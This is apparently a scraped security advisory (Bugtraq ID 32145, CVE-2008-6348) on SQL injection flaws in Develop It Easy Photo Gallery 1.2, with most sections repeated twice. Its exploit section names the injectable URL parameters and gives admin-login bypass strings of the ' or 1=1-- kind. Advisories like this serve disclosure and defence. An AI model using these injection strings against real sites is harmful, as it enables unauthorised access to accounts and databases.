Develop It Easy Photo Gallery Multiple SQL Injection Vulnerabilities
BID:32145
Info
Develop It Easy Photo Gallery Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 32145 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6348 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 06 2008 12:00AM |
| Updated: | Apr 16 2015 05:51PM |
| Credit: | Cyb3r-1sT |
| Vulnerable: |
Develop It Easy Photo Gallery 1.2 |
| Not Vulnerable: | |
Discussion
Develop It Easy Photo Gallery Multiple SQL Injection Vulnerabilities
Develop It Easy Photo Gallery is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Photo Gallery 1.2 is vulnerable; other versions may also be affected.
Develop It Easy Photo Gallery is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Photo Gallery 1.2 is vulnerable; other versions may also be affected.
Exploit / POC
Develop It Easy Photo Gallery Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/gallery_category.php?cat_id=[sql]
http://www.example.com/gallery_photo.php?photo_id=[sql]
http://www.example.com/photogallery/admin
user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- )
pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- )
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/gallery_category.php?cat_id=[sql]
http://www.example.com/gallery_photo.php?photo_id=[sql]
http://www.example.com/photogallery/admin
user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- )
pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- )
Solution / Fix
Develop It Easy Photo Gallery Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Develop It Easy Photo Gallery Multiple SQL Injection Vulnerabilities
References:
References:
- Photo Gallery Homepage (Develop It Easy)